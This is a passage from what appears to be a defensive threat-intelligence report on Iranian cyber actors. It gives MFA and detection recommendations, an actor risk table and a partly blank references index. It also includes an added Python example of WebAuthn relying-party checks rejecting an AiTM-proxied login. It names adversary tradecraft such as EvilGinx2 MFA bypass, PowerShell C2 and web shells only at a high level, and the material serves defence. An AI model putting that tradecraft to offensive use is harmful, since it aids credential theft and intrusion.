2. MFA alone is not sufficient against Iran's credential theft operations.
Charming Kitten's EvilGinx2 infrastructure defeated MFA for thousands of targets. Any organization with high-value intelligence targets (government, think tanks, policy organizations, journalists) should assume that standard MFA (TOTP apps, SMS) can be defeated by determined Iran operators.
Investment priority: Phishing-resistant, device-bound authentication (FIDO2 hardware keys or device-certificate-based Conditional Access). A FIDO2 assertion is signed over the origin the browser actually connected to, so a response captured on an AiTM proxy domain fails verification at the real identity provider, and the private key never leaves the device. Caveat: phishing-resistant MFA protects the authentication step, not the session issued afterwards; pair it with token protection / continuous access evaluation and the session-replay hunt in Part IV.
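Why the AiTM proxy fails against FIDO2, shown as an added example that is not part of the original article: the relying-party checks that precede any signature verification in a WebAuthn assertion. The browser, not the page, writes the origin it connected to into clientDataJSON, and the authenticator signs over it, so a proxy-captured response carries the proxy's origin and is rejected; the first 32 bytes of authenticatorData are SHA-256 of the RP ID and are checked the same way. The relying party name, the proxy lookalike domain and the client data are constructed, and the signature check itself is omitted because the rejection happens before it.

```python
import base64
import hashlib
import json
import secrets

# Constructed relying party and AiTM lookalike; both names are assumptions for the example.
RP_ID = "login.example-idp.com"
EXPECTED_ORIGIN = "https://" + RP_ID
PROXY_ORIGIN = "https://login.example-idp.com.secure-verify.example"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def build_client_data(challenge: bytes, origin: str) -> bytes:
    """clientDataJSON as the browser constructs it: the RP's challenge plus the ORIGIN the
    browser is actually talking to. Through an AiTM proxy that origin is the proxy's."""
    return json.dumps({"type": "webauthn.get", "challenge": b64url(challenge), "origin": origin}).encode()


def build_auth_data(rp_id: str) -> bytes:
    """authenticatorData prefix: SHA-256(rpId), one flags byte (UP), 4-byte counter (constructed)."""
    return hashlib.sha256(rp_id.encode()).digest() + b"\x01" + (1).to_bytes(4, "big")


def verify_assertion(client_data_json: bytes, auth_data: bytes, expected_challenge: bytes,
                     expected_origin: str, rp_id: str):
    """Relying-party checks from the WebAuthn assertion ceremony, in order. Returns (ok, reason).
    A real verifier continues to the signature over SHA-256(clientDataJSON) || authData."""
    cd = json.loads(client_data_json)
    if cd.get("type") != "webauthn.get":
        return False, "wrong_type"
    if cd.get("challenge") != b64url(expected_challenge):
        return False, "challenge_mismatch"      # replayed or foreign challenge
    if cd.get("origin") != expected_origin:
        return False, "origin_mismatch"         # the AiTM case: signed for the proxy's origin
    if auth_data[:32] != hashlib.sha256(rp_id.encode()).digest():
        return False, "rp_id_hash_mismatch"     # credential scoped to a different RP
    return True, "ok"


def demo(challenge: bytes = None):
    """Legitimate login versus the same challenge relayed through an AiTM proxy."""
    challenge = challenge or secrets.token_bytes(32)
    auth_data = build_auth_data(RP_ID)
    legit = verify_assertion(build_client_data(challenge, EXPECTED_ORIGIN), auth_data,
                             challenge, EXPECTED_ORIGIN, RP_ID)
    phished = verify_assertion(build_client_data(challenge, PROXY_ORIGIN), auth_data,
                               challenge, EXPECTED_ORIGIN, RP_ID)
    return legit, phished


if __name__ == "__main__":
    print(demo())
```

In practice the browser would not even offer a credential registered to login.example-idp.com on the proxy's domain, because the RP ID must be a registrable suffix of the current origin; the check shown is the server-side backstop for the same property. Contrast this with TOTP or push approval, where the one-time code or approval is origin-agnostic and relays cleanly through EvilGinx2.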
3. The 14–21 day ransomware pivot means your EDR detection window is measured in weeks, not hours.
Iran's most common ransomware deployment pattern involves 2–3 weeks of espionage before pivoting to ransom. This means an organization that detects and evicts an Iranian intrusion quickly (within days of initial access) prevents the ransomware entirely. The same organization that detects at week 4 has both lost the intelligence AND faces a ransomware incident.
Investment priority: Mean Time to Detection (MTTD) improvement — specifically, detection of the early-stage indicators (PowerShell-based C2, web shell activity, privilege escalation attempts) within 72 hours of initial compromise, not 2–3 weeks.
Risk Prioritization by Actor
Actor | Likelihood | Impact | Your Asset at Risk |
MuddyWater | HIGH (broad targeting) | HIGH | Email, internal documents, potential ransomware |
Charming Kitten | MEDIUM–HIGH (targeted: researchers, gov, media) | HIGH | Email communications, credentials, personal safety risk for individuals |
APT34 / OilRig | MEDIUM (gov, energy, finance focus) | HIGH | Strategic communications, OT/ICS data |
CyberAv3ngers | HIGH (if OT/water/energy) | HIGH | OT process disruption, public-facing defacement |
Handala | LOW–MEDIUM (Israel/Gulf-adjacent) | HIGH | Data destruction, public reputation damage |
Agrius | MEDIUM (Israel-adjacent industry) | CRITICAL | Full data destruction via wiper + ransom cover |
This document reflects threat intelligence through February 2026. Iran's operational tempo is tightly coupled to geopolitical events. When reviewing this document's currency, always check current Iran-Israel and Iran-US geopolitical status — heightened tensions directly predict heightened cyber operations within 72–96 hours.
Master References Index
Government & Regulatory Advisories
Title | Publisher | Date |
IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater | CISA / FBI / NSA / EPA | December 2023 |
Iranian Government-Sponsored MuddyWater Actors Conduct Cyber Operations Against Global Government and Commercial Networks | CISA | February 2022 |
Iranian Cyber Actors Brute Force and Credential Access Activity Compromises Critical Infrastructure Organizations | FBI / CISA / DC3 | August 2024 |
Unitronics Vision Series PLC Vulnerabilities | CISA ICS-CERT | December 2023 |
National Terrorism Advisory System Bulletin — Elevated Iran Cyber Threat | DHS | June 2025 |
Annual Threat Intelligence Reports
Publisher | Year |
CrowdStrike | 2026 |
Palo Alto Networks Unit 42 | 2026 |
Check Point | 2026 |
Vendor Threat Intelligence Reports
Actor / Campaign | Report Title | Publisher | Year |
CyberAv3ngers | | MITRE ATT&CK | Ongoing |
APT34 / OilRig | "Witchetty: Group Uses Updated Toolset in Attacks on Governments in Middle East" | Symantec | 2022 |
APT34 / OilRig | | MITRE ATT&CK | Ongoing |
Charming Kitten | "Mint Sandstorm Refines Tradecraft to Attack High-Value Targets" | Microsoft MSTIC | 2023 |
Charming Kitten | | MITRE ATT&CK | Ongoing |
MuddyWater | | HHS HC3 | 2022 |
MuddyWater | | MITRE ATT&CK | Ongoing |
Agrius | | MITRE ATT&CK | Ongoing |
OT/ICS-Specific References
Title | Publisher | Year |
 | Dragos | 2026 |
"Improving Cybersecurity in the Water and Wastewater Systems Sector" | EPA / CISA / FBI | 2024 |
 | WaterISAC | 2023–2024 |